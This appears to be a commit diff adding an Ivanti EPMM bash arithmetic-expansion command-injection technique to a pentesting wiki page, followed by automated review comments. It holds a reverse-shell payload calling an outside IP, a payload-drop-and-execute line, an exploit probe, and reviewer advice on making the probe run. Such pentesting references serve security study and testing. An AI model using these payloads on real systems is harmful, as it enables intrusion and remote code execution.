Commit 0df6755

Merge pull request #1909 from HackTricks-wiki/update_Critical_Vulnerabilities_in_Ivanti_EPMM_Exploited_20260218_020115
Critical Vulnerabilities in Ivanti EPMM Exploited
2 parents 873cac5 + 39e2392 commit 0df6755

1 file changed

Lines changed: 28 additions & 0 deletions

src/pentesting-web/command-injection.md

@@ -49,6 +49,33 @@ vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
4949
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay
5050
```
5151

52+
### Bash arithmetic evaluation in RewriteMap/CGI-style scripts
53+
54+
RewriteMap helpers written in **bash** sometimes push query params into globals and later compare them in **arithmetic contexts** (`[[ $a -gt $b ]]`, `$((...))`, `let`). Arithmetic expansion re-tokenizes the content, so attacker-controlled variable names or array references are expanded twice and can execute.
55+
56+
**Pattern seen in Ivanti EPMM RewriteMap helpers:**
57+
58+
1. Params map to globals (`st``gStartTime`, `h``theValue`).
59+
2. Later check:
60+
```bash
61+
if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then
62+
...
63+
fi
64+
```
65+
3. Send `st=theValue` so `gStartTime` points to the string `theValue`.
66+
4. Send `h=gPath['sleep 5']` so `theValue` contains an array index; during the arithmetic check it runs `sleep 5` (swap for a real payload).
67+
68+
Probe (~5s delay then 404 if vulnerable):
69+
70+
```bash
71+
curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']"
72+
```
73+
74+
Notes:
75+
76+
- Look for the same helper under other prefixes (e.g., `/mifs/c/aftstore/fob/`).
77+
- Arithmetic contexts treat unknown tokens as variable/array identifiers, so this bypasses simple metacharacter filters.
78+
5279
### Parameters
5380

5481
Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)):
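Review bot: the curl probe in this hunk will not reach the target as written, because curl treats `[` and `]` in a URL as a glob range and aborts on `gPath['sleep 5']`; pass `-g` (`--globoff`) or percent-encode the brackets, and encode the space as `%20` (or build the query with `-G --data-urlencode`) so the request line is valid. Two smaller points in the same hunk: step 1 reads `st``gStartTime`, `h``theValue`, with the separator between each parameter and its global dropped, so it renders as one broken code span and should be written as `st` -> `gStartTime`, `h` -> `theValue`; and step 4 should spell out why the subscript executes: in `[[ ... -gt ${gStartTime} ]]` bash evaluates the string `theValue` as an arithmetic expression, resolves it to that variable's contents, and when the contents are an indexed-array reference it word-expands the subscript, so a subscript carrying a command substitution (`$(...)` or backticks) runs. With the payload shown as `'sleep 5'` in single quotes it is not obvious where the command substitution happens, so confirm the exact quoting the referenced research used and state explicitly that the subscript must contain a command substitution. The closing note about arithmetic contexts treating unknown tokens as variable/array identifiers is correct and is the right justification for the metacharacter-filter bypass claim.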
@@ -240,5 +267,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject
240267
- [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/)
241268
- [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html)
242269
- [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py)
270+
- [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)
243271

244272
{{#include ../banners/hacktricks-training.md}}
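Review bot: the new reference entry carries the CVE identifiers only inside its URL (cve-2026-1281, cve-2026-1340), and the RewriteMap subsection added in the previous hunk never names them; consider adding the CVE IDs to the link title or to that subsection so readers can tie the technique to the advisories.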
